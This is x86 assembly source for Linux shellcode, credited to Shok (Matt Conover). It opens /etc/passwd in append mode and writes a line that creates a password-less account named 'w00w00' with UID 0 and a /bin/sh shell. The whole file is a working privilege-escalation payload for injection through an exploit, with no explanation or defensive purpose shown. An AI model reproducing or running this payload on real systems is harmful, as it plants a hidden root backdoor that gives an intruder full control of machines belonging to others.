# Source to pass.c (shell code to append a root line to the passwd file)
# Shok (Matt Conover), shok@dataforce.net

  jmp call_w00w00

w00w00:
  popl %edi
  jmp w0w0w

call_w00w00:

  call w00w00

w0w0w:

 # OPEN
 # ecx=flag (O_RDONLY, O_WRONLY, ...) 
 #     O_WRONLY | O_APPEND | O_CREAT = 0x441
 # edx=file mode
 # ebx=address of filename
 # eax=0x05 syscall number

  xorl %ebx,%ebx
  movb $(file-w0w0w),%bl
  addl %edi,%ebx

  xorb %al,%al
  movb %al,11(%ebx)

  xorl %ecx,%ecx
  movw $0x441,%cx

  xorl %edx,%edx
  movw $00644,%dx

  xorl %eax,%eax
  movb $0x5,%al

  int $0x80
  movl %eax,%ebx    # save file descriptor to %ebx (for write)
 
#  WRITE
#  ecx=address of buffer to write
#  edx=number of bytes to write
#  ebx=file descriptor
#  eax=0x04
  
  xorl %ecx,%ecx
  movb $(string-w0w0w),%cl
  addl %edi,%ecx

  xorl %edx,%edx
  movb $31,%dl

  xorl %eax,%eax
  movb $0x04,%al

  int $0x80                                           
  
  xorl %eax,%eax
  movb $1,%al
  int $0x80
  
file:  
.ascii "/etc/passwd"
endfile:
.byte 1 
string:
.ascii "w00w00::0:0:w0w0w!:/:/bin/sh\n"